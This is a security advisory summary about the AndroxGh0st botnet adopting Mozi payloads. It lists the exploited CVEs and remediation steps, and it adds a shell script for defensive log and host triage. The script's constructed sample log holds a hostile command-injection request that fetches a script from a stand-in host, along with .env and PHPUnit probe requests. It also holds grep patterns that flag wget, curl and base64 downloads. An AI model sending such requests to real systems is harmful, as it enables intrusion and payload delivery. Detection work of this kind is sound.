AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services

Summary:
AndroxGh0st, a Python-based cloud attack tool known for targeting Laravel applications in order to harvest sensitive data pertaining to services such as Amazon Web Services, is being used in a campaign exploiting a wider set of security flaws affecting various internet-facing applications. The AndroxGh0st botnet uses remote code execution and credential-stealing methods to maintain persistent access, leveraging unpatched vulnerabilities to infiltrate critical infrastructure. Since January 2024, AndroxGh0st has adopted payloads and tactics from Mozi, allowing it to target systems such as Cisco ASA, Atlassian Jira, and PHP frameworks. Observed actively conducting operations since 2022, AndroxGh0st has leveraged flaws in the Apache HTTP Server (CVE-2021-41773), the Laravel Framework (CVE-2018-15133), and PHPUnit (CVE-2017-9841) to gain initial access, escalate privileges, and establish persistent control over compromised systems. In January 2024, U.S. cybersecurity and intelligence agencies warned that attackers are using AndroxGh0st malware to build a botnet for victim identification and exploitation in target networks. Analysis from CloudSEK indicates the malware now leverages the following vulnerabilities to gain initial access:
  • CVE-2014-2120 (CVSS score: 4.3) - Cisco ASA WebVPN login page XSS vulnerability
  • CVE-2018-10561 (CVSS score: 9.8) - Dasan GPON authentication bypass vulnerability
  • CVE-2018-10562 (CVSS score: 9.8) - Dasan GPON command injection vulnerability
  • CVE-2021-26086 (CVSS score: 5.3) - Atlassian Jira path traversal vulnerability
  • CVE-2021-41277 (CVSS score: 7.5) - Metabase GeoJSON map local file inclusion vulnerability
  • CVE-2022-1040 (CVSS score: 9.8) - Sophos Firewall authentication bypass vulnerability
  • CVE-2022-21587 (CVSS score: 9.8) - Oracle E-Business Suite (EBS) Unauthenticated arbitrary file upload vulnerability
  • CVE-2023-1389 (CVSS score: 8.8) - TP-Link Archer AX21 firmware command injection vulnerability
  • CVE-2024-4577 (CVSS score: 9.8) - PHP CGI argument injection vulnerability
  • CVE-2024-36401 (CVSS score: 9.8) - GeoServer remote code execution vulnerability
The Mozi botnet, whose authors were arrested by the Chinese government in September 2021, was known for its DDoS attacks; a kill switch command was not issued to the botnet until August 2023. Threat actors utilizing AndroxGh0st and Mozi are not just sharing resources but combining functionality to perform new operations.

Security Officer Comments:
The resurfacing of the Mozi botnet inside AndroxGh0st activity, as highlighted by CloudSEK, marks a strategic expansion and the integration of elements from two kinds of malware. CloudSEK recommends immediate patching of the vulnerabilities listed above to mitigate risks associated with the AndroxGh0st botnet, which is known for systematic exploitation and persistent backdoor access. If AndroxGh0st is teaming up and consolidating with Mozi, that would mean AndroxGh0st has expanded to leverage Mozi's propagation power to infect more IoT devices, using Mozi's payloads to accomplish goals that would otherwise require separate infection routines. Because the two kinds of malware have been observed sharing the same command infrastructure, it is likely that both are controlled by the same threat group, potentially with the goal of streamlining their infection chains and enhancing the effectiveness of both botnets.

Suggested Corrections:
IOCs for this activity are available in the CloudSEK report linked below.
  • Review HTTP and Web Server Logs
    • Check for Suspicious Requests: Look for HTTP GET or POST requests that include unusual or suspicious commands, such as wget, curl, or command injection parameters like cmd=rm or cmd=wget. These are common signs of attempted command injection by Androxgh0st.
    • Check for Unusual Login Attempts: Look for repeated failed login attempts, indicating brute-force activity on login pages such as /wp-login.php, /admin_login, or /cgi-bin/login.cgi. These may target default credentials or weak passwords.
  • Monitor System Processes for Unexpected Activity
    • Identify Suspicious Processes: Use commands like ps aux or top to look for unexpected processes running from unusual locations (e.g., /tmp, /var/tmp, or /dev/shm), which is typical of botnet payloads.
    • Inspect Crontab Entries and Startup Scripts: Androxgh0st often attempts persistence by modifying crontab files or startup scripts. Use the following command for each user account (including the web server user, e.g. www-data) to check for any suspicious entries, and review the system-wide cron files and directories as well:
    • crontab -l
  • Examine Suspicious Files in Temporary Directories
    • Inspect /tmp, /var/tmp, and /dev/shm Directories: Androxgh0st payloads and scripts are often downloaded and executed from these directories. Look for files with unusual names or recent changes in these locations:
    • ls -la /tmp
    • ls -la /var/tmp
    • ls -la /dev/shm
    • Check File Permissions and Executable Files: Files in these directories should not typically be executable. Use find to locate executable files in these directories:
    • find /tmp -type f -perm /111
  • Analyze Network Connections and Traffic
    • Monitor Outbound Connections to Known Malicious IPs or Domains: Androxgh0st may establish connections to its command-and-control (C2) server. Use tools like netstat or ss to identify active network connections:
    • netstat -antp | grep ESTABLISHED
    • Look for unusual outbound connections on uncommon ports (e.g., high-numbered ports) or to external IPs that you don't recognize.
    • Check for Excessive or Unusual Traffic Patterns: Androxgh0st-infected devices may exhibit unusual traffic, particularly if they are participating in a botnet. Monitor traffic for signs of:
      • Repeated DNS lookups for suspicious domains.
      • High volumes of outbound traffic that may indicate participation in DDoS activities.
  • Review Security Configurations for Changes
    • Check for Unexpected Changes to Firewall and Router Settings: Androxgh0st may attempt to open additional ports or modify firewall rules. Review firewall rules and router settings for unexpected modifications.
    • Inspect SSH Configuration for Weaknesses or Unauthorized Keys: If Androxgh0st used SSH brute-forcing to gain access, verify that no new SSH keys have been added to ~/.ssh/authorized_keys for any account, including root and service accounts.
  • Scan for Known Vulnerabilities and Apply Patches
    • Identify Vulnerable Services and Applications: Androxgh0st often exploits known vulnerabilities in web servers, routers, and IoT devices. Use continuous attack surface scanners to detect any unpatched services or applications.
    • Update Firmware and Software Regularly: Ensure that all devices, particularly IoT devices and routers, are running the latest firmware versions, as Androxgh0st targets unpatched CVEs.
  • Use Endpoint Detection Tools
    • Run Endpoint Detection and Response (EDR) Software: EDR tools can help identify unusual behaviors, unauthorized processes, and suspicious files that may indicate Androxgh0st infection.
    • Conduct a File Integrity Check: Use tools that can detect changes to critical system files, startup configurations, or web server files.
  • Check Logs for Signs of Persistence Mechanisms
    • Look for Modified Configuration Files: Review configuration files for any injected commands that would re-enable the botnet upon reboot. This includes files such as /etc/rc.local, .bashrc, or any custom startup scripts.
    • Audit System Logs for Malicious Activity Patterns: Look for patterns in auth.log, syslog, or application logs that may indicate Androxgh0st’s activity, including unexpected root login attempts or commands executed by web server user accounts.
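The following script is an added example that turns the log, process, temp-directory and persistence checks listed above into repeatable shell functions. It is not code from CloudSEK or from the AndroxGh0st/Mozi reporting; the access log it builds, the IP addresses, the login paths and the scratch directories are constructed for illustration, and the patterns are the ones named in the steps above (cmd=, wget, curl, rm, login pages, files under /tmp, /var/tmp and /dev/shm) plus the PHPUnit eval-stdin.php and Laravel .env probes associated with the CVEs in the Summary.

```shell
#!/bin/sh
# Added example for the triage steps above. Not code from CloudSEK or the
# AndroxGh0st/Mozi reports; the sample log, IPs and paths are constructed.

# Write a small constructed access log (combined log format) and print its path.
make_sample_log() {
  f=$(mktemp) || return 1
  cat > "$f" <<'EOF'
203.0.113.7 - - [05/Nov/2024:10:01:12 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Nov/2024:10:01:13 +0000] "GET /.env HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [05/Nov/2024:10:02:01 +0000] "GET /cgi-bin/luci/?cmd=wget%20http://198.51.100.9/x.sh HTTP/1.1" 200 0 "-" "curl/7.88.1"
192.0.2.5 - - [05/Nov/2024:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.5 - - [05/Nov/2024:10:03:30 +0000] "POST /wp-login.php HTTP/1.1" 401 0 "-" "Mozilla/5.0"
192.0.2.5 - - [05/Nov/2024:10:03:41 +0000] "POST /wp-login.php HTTP/1.1" 200 3400 "-" "Mozilla/5.0"
198.51.100.22 - - [05/Nov/2024:10:04:10 +0000] "POST /wp-login.php HTTP/1.1" 401 0 "-" "python-requests/2.31"
198.51.100.22 - - [05/Nov/2024:10:04:11 +0000] "POST /wp-login.php HTTP/1.1" 401 0 "-" "python-requests/2.31"
198.51.100.22 - - [05/Nov/2024:10:04:12 +0000] "POST /wp-login.php HTTP/1.1" 401 0 "-" "python-requests/2.31"
198.51.100.22 - - [05/Nov/2024:10:04:13 +0000] "POST /wp-login.php HTTP/1.1" 401 0 "-" "python-requests/2.31"
198.51.100.22 - - [05/Nov/2024:10:04:14 +0000] "POST /wp-login.php HTTP/1.1" 401 0 "-" "python-requests/2.31"
198.51.100.22 - - [05/Nov/2024:10:04:15 +0000] "POST /wp-login.php HTTP/1.1" 401 0 "-" "python-requests/2.31"
EOF
  printf '%s\n' "$f"
}

# Print requests whose target carries command-injection style parameters
# (cmd=, wget, curl, rm) or the .env / eval-stdin.php probes. Only the quoted
# request field is inspected, so a "curl/..." User-Agent alone does not match.
suspicious_requests() {
  awk -F'"' '{ print $2 }' "$1" \
    | grep -Ei 'cmd=|[?&=]wget|[?&=]curl|(%20|[ +;|&])rm(%20| )|/\.env( |$)|eval-stdin\.php' || true
}

count_suspicious_requests() {
  suspicious_requests "$1" | grep -c . || true
}

# Print "failures ip" for every source with at least $2 failed (401/403)
# requests to a login page in log $1, most active source first.
bruteforce_sources() {
  awk -v thr="$2" '
    $7 ~ /wp-login\.php|admin_login|cgi-bin\/login\.cgi/ && ($9 == 401 || $9 == 403) { n[$1]++ }
    END { for (ip in n) if (n[ip] >= thr) print n[ip], ip }' "$1" | sort -rn
}

# List regular files with any execute bit set under the given directories
# (default: the scratch locations payloads are dropped into). Octal -perm
# tests are used so this works with both GNU and BSD find.
executables_in() {
  [ $# -gt 0 ] || set -- /tmp /var/tmp /dev/shm
  for d in "$@"; do
    if [ -d "$d" ]; then
      find "$d" -type f \( -perm -100 -o -perm -010 -o -perm -001 \) 2>/dev/null || true
    fi
  done
}

# Flag lines in cron or startup files that download something or run from a
# scratch directory, which is how these botnets typically survive a reboot.
persistence_hints() {
  grep -HEn '(wget|curl|base64 -d|/tmp/|/var/tmp/|/dev/shm/)' "$@" 2>/dev/null || true
}

# Run every check against the constructed log (and the real host) with --demo.
if [ "${1:-}" = "--demo" ]; then
  log=$(make_sample_log)
  echo "== suspicious requests =="; suspicious_requests "$log"
  echo "== brute-force sources (>= 5 failures) =="; bruteforce_sources "$log" 5
  echo "== executables in scratch dirs =="; executables_in
  echo "== persistence hints =="; persistence_hints /etc/crontab /etc/rc.local "$HOME/.bashrc"
  rm -f "$log"
fi
```

Point suspicious_requests and bruteforce_sources at the real access log instead of the constructed one, add the login paths your own applications expose, and run the script as root so that the scratch directories and every user's crontab are readable; a hit is a lead to investigate, not proof of compromise.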
Link(s):
https://thehackernews.com/2024/11/androxgh0st-malware-integrates-mozi.html

https://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave